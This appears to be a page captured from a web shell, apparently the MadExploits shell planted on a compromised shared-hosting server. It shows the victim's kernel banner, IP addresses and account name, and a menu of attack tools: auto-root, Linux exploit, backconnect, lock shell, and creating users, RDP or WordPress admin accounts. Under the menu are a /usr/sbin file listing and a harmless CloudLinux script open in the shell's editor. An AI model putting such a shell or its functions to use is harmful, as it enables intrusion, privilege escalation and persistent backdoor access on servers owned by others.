Linux premium180.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
: 162.0.209.168 | : 216.73.216.208
Cant Read [ /etc/named.conf ]
8.3.30
nortrmdp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
sbin /
[ HOME SHELL ]
Name
Size
Permission
Action
cagefs_enter_site
1.83
KB
-rwxr-xr-x
cagefsctl-user
12.89
KB
-rwxr-xr-x
chroot
41.45
KB
-rwxr-xr-x
cloudlinux-selector
654
B
-rwxr-xr-x
consoletype
11.88
KB
-rwxr-xr-x
cracklib-check
13.05
KB
-rwxr-xr-x
cracklib-format
251
B
-rwxr-xr-x
cracklib-packer
13.05
KB
-rwxr-xr-x
cracklib-unpacker
9.03
KB
-rwxr-xr-x
create-cracklib-dict
990
B
-rwxr-xr-x
cxs
1.25
KB
-rwxr-xr-x
ddns-confgen
20.45
KB
-rwxr-xr-x
dnssec-checkds
936
B
-rwxr-xr-x
dnssec-coverage
938
B
-rwxr-xr-x
dnssec-dsfromkey
60.84
KB
-rwxr-xr-x
dnssec-importkey
60.84
KB
-rwxr-xr-x
dnssec-keyfromlabel
64.76
KB
-rwxr-xr-x
dnssec-keygen
72.84
KB
-rwxr-xr-x
dnssec-keymgr
934
B
-rwxr-xr-x
dnssec-revoke
56.74
KB
-rwxr-xr-x
dnssec-settime
60.84
KB
-rwxr-xr-x
dnssec-signzone
117.2
KB
-rwxr-xr-x
dnssec-verify
52.84
KB
-rwxr-xr-x
exim
1.25
KB
-rwxr-xr-x
faillock
20.52
KB
-rwxr-xr-x
genrandom
12.38
KB
-rwxr-xr-x
ip
693.3
KB
-rwxr-xr-x
isc-hmac-fixup
11.85
KB
-rwxr-xr-x
ldconfig
986.09
KB
-rwxr-xr-x
mkhomedir_helper
24.44
KB
-rwxr-xr-x
named-checkzone
36.63
KB
-rwxr-xr-x
named-compilezone
36.63
KB
-rwxr-xr-x
nsec3hash
12.29
KB
-rwxr-xr-x
pam_console_apply
45.2
KB
-rwxr-xr-x
pam_timestamp_check
11.87
KB
-rwxr-xr-x
pluginviewer
20.57
KB
-rwxr-xr-x
proxyexec
21.17
KB
-r-xr-xr-x
pwhistory_helper
20.44
KB
-rwxr-xr-x
saslauthd
94.42
KB
-rwxr-xr-x
sasldblistusers2
20.77
KB
-rwxr-xr-x
saslpasswd2
16.42
KB
-rwxr-xr-x
sendmail
1.26
KB
-rwxr-xr-x
testsaslauthd
16.66
KB
-rwxr-xr-x
tmpwatch
35.47
KB
-rwxr-xr-x
tsig-keygen
20.45
KB
-rwxr-xr-x
unix_chkpwd
36.86
KB
-rwxr-xr-x
unix_update
36.86
KB
-rwx------
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cagefs_enter_site
#!/opt/cloudlinux/venv/bin/python3 -sbb # -*- coding: utf-8 -*- # # Copyright © Cloud Linux GmbH & Cloud Linux Software, Inc 2010-2025 All Rights Reserved # # Licensed under CLOUD LINUX LICENSE AGREEMENT # https://cloudlinux.com/docs/LICENCE.TXT # """ Execute a command inside CageFS for a site (document root or domain). This wrapper provides a command-line interface for executing commands within the isolated CageFS environment for a specific website. """ import argparse import os import sys from clcagefslib.webisolation import libenter def create_parser(): """ Create argument parser for cagefs_enter_site. Returns: argparse.ArgumentParser: Configured argument parser """ parser = argparse.ArgumentParser( # the command is named with _underscores_ to match # existing cagefs_enter wrapper from lvewrappers prog="cagefs_enter_site", description="Execute a command inside CageFS for a site (document root or domain)", ) parser.add_argument("site", type=str, help="Document root or domain") parser.add_argument( "command", type=str, nargs=argparse.REMAINDER, help="Command to execute" ) return parser def main(): """ Main entry point. Returns: int: Exit code """ parser = create_parser() args = parser.parse_args() if not args.command: parser.error("COMMAND is required") try: return libenter.enter_site(args.site, args.command) except ValueError as e: print(f"Error: {e}", file=sys.stderr) return 1 except KeyboardInterrupt: # Clean Ctrl+C exit without traceback (exit code 130 = SIGINT). return 130 if __name__ == "__main__": if os.geteuid() == 0: print("Error: This program can not be run as root", file=sys.stderr) sys.exit(1) sys.exit(main())
Close